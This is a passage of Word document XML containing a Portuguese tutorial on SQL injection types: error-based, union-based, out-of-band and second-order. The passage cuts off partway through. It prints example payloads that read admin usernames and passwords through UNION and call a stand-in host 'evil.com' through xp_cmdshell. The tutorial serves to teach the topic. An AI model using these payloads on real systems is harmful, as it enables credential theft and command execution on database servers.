      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta parte da condição é mais complexa. Ela está comparando </w:t>
      </w:r>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>se 1 é igual à versão do sistema convertida para um valor inteiro</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">. A função </w:t>
      </w:r>
      <w:r w:rsidRPr="003E26FF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONVERT(int, (SELECT @@version))</w:t>
      </w:r>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> é usada para obter a versão do sistema e tentar convertê-la para um número inteiro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4828A4" w14:textId="77777777" w:rsidR="005B0C40" w:rsidRPr="005B0C40" w:rsidRDefault="005B0C40" w:rsidP="005B0C40">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E02F045" w14:textId="787F868E" w:rsidR="005B0C40" w:rsidRPr="005B0C40" w:rsidRDefault="005B0C40" w:rsidP="005B0C40">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B0C40">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Essa consulta é uma tentativa de obter informações sobre a versão do sistema por meio da injeção de SQL. O uso de funções como CONVERT e @@version pode ser explorado por atacantes para descobrir detalhes sobre o banco de dados ou servidor em execução.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A31F59F" w14:textId="77777777" w:rsidR="0087038E" w:rsidRPr="005B0C40" w:rsidRDefault="0087038E" w:rsidP="0087038E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3411FCCC" w14:textId="40019F9A" w:rsidR="003D002C" w:rsidRPr="005150DF" w:rsidRDefault="003D002C" w:rsidP="005150DF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Union-Based SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311BFBD9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explora a capacidade de realizar operações UNION SQL para combinar resultados de diferentes consultas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1999703A" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00924FF6" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT name, email FROM users WHERE id = 1 UNION SELECT username, password FROM admins;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F5BAC" w14:textId="77777777" w:rsidR="00924FF6" w:rsidRPr="002512A2" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE02582" w14:textId="71CACED3" w:rsidR="00924FF6" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obs: `</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">: Aqui está o ponto crucial. A palavra-chave </w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> é utilizada para combinar o resultado da consulta anterior com o resultado de outra consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CA615" w14:textId="77777777" w:rsidR="00924FF6" w:rsidRPr="00924FF6" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780BD8CB" w14:textId="58FC54D3" w:rsidR="00924FF6" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT username, password FROM admins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta é a segunda parte da consulta que tenta obter os campos </w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> da tabela "admins".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024A943" w14:textId="77777777" w:rsidR="0001756C" w:rsidRPr="00924FF6" w:rsidRDefault="0001756C" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9F7404" w14:textId="6095AF9C" w:rsidR="00924FF6" w:rsidRPr="00924FF6" w:rsidRDefault="00924FF6" w:rsidP="00924FF6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">A ideia por trás dessa injeção de SQL com UNION </w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>é combinar os resultados de duas consultas</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>diferentes</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>em uma única tabela de resultados.</w:t>
      </w:r>
      <w:r w:rsidRPr="00924FF6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se o número de colunas e os tipos de dados coincidirem entre as duas consultas, o resultado da união será uma tabela que inclui informações tanto dos usuários quanto dos administradores</w:t>
      </w:r>
      <w:r w:rsidR="006F0CC8">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE0D99A" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00924FF6" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7323FC" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="005150DF" w:rsidRDefault="003D002C" w:rsidP="005150DF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005150DF">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Out-of-Band SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123835E5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extrai dados usando meios alternativos, como DNS requests ou HTTP requests, em vez de depender da resposta da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11784047" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00C13E29" w:rsidRDefault="003D002C" w:rsidP="003D002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT name FROM employees; EXEC xp_cmdshell('nslookup evil.com');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BD4842" w14:textId="77777777" w:rsidR="00C13E29" w:rsidRPr="00C13E29" w:rsidRDefault="00C13E29" w:rsidP="00C13E29">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111ED883" w14:textId="798132D9" w:rsidR="00C13E29" w:rsidRPr="00C13E29" w:rsidRDefault="00C13E29" w:rsidP="00C13E29">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EXEC xp_cmdshell('nslookup evil.com');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esta é a parte maliciosa da consulta. A função xp_cmdshell é uma função estendida no SQL Server que permite a execução de comandos do </w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sistema operacional. Neste caso, está tentando executar o comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nslookup evil.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, que é utilizado para realizar uma consulta DNS e pode ser utilizado maliciosamente para obter informações sobre o domínio "evil.com".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B76BD" w14:textId="77777777" w:rsidR="00C13E29" w:rsidRPr="00C13E29" w:rsidRDefault="00C13E29" w:rsidP="00C13E29">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5AD3D6" w14:textId="6094E8A6" w:rsidR="00C13E29" w:rsidRPr="00C13E29" w:rsidRDefault="00C13E29" w:rsidP="00C13E29">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve">Essa tentativa de injeção de SQL é perigosa </w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>porque permite a execução de comandos do sistema operacional diretamente do banco de dados</w:t>
      </w:r>
      <w:r w:rsidRPr="00C13E29">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>, o que pode levar a sérias vulnerabilidades de segurança.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1DEAE" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="00C13E29" w:rsidRDefault="003D002C" w:rsidP="004C4BE6">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D468C1B" w14:textId="77777777" w:rsidR="003D002C" w:rsidRPr="003D002C" w:rsidRDefault="003D002C" w:rsidP="004C4BE6">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Second-Order SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2679B702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injeta código SQL em uma aplicação, mas a execução real ocorre em uma etapa posterior, geralmente após o processamento do input pelo servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EA158" w14:textId="77777777" w:rsid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Exemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D002C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injeção em dados que são armazenados em um banco de dados e usados posteriormente em uma consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B526ACC" w14:textId="77777777" w:rsidR="009D4C5A" w:rsidRDefault="009D4C5A" w:rsidP="009D4C5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361BBF5C" w14:textId="5BF3E5CF" w:rsidR="009D4C5A" w:rsidRDefault="009D4C5A" w:rsidP="009D4C5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Obs: </w:t>
      </w:r>
      <w:r w:rsidRPr="009D4C5A">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Suponha que você tenha um sistema de login onde os dados do usuário são armazenados no banco de dados. Primeiro, um usuário se registra e fornece seu nome de usuário e senha. Os dados são armazenados no banco de dados da seguinte maneira:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46DDB0" w14:textId="77777777" w:rsidR="009D4C5A" w:rsidRDefault="009D4C5A" w:rsidP="009D4C5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FFCF2F" w14:textId="77777777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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- Tabela "users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC1020" w14:textId="77777777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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C34B22" w14:textId="46627BD8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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INT PRIMARY KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172610F9" w14:textId="4B35E330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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VARCHAR(50),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65EE16" w14:textId="6D597A7B" w:rsidR="009D4C5A" w:rsidRPr="002512A2" w:rsidRDefault="009D4C5A" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B7C5D" w14:textId="77777777" w:rsidR="009D4C5A" w:rsidRPr="002512A2" w:rsidRDefault="009D4C5A" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8EC25D" w14:textId="77777777" w:rsidR="009D4C5A" w:rsidRPr="002512A2" w:rsidRDefault="009D4C5A" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C36E09" w14:textId="77777777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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Dados de exemplo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6119AD" w14:textId="77777777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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO</w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> users (id, username, password) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C450F9">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422C37C" w14:textId="77777777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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(1, 'usuario1', 'senha1'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD0979" w14:textId="54B24A61" w:rsidR="009D4C5A" w:rsidRPr="00C450F9" w:rsidRDefault="009D4C5A" w:rsidP="00750688">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(2, 'usuario2', 'senha2');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E484C" w14:textId="77777777" w:rsidR="004B6B65" w:rsidRDefault="004B6B65" w:rsidP="009D4C5A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D26760" w14:textId="2F2669A6" w:rsidR="004B6B65" w:rsidRDefault="004B6B65" w:rsidP="009D4C5A">
      <w:pPr>
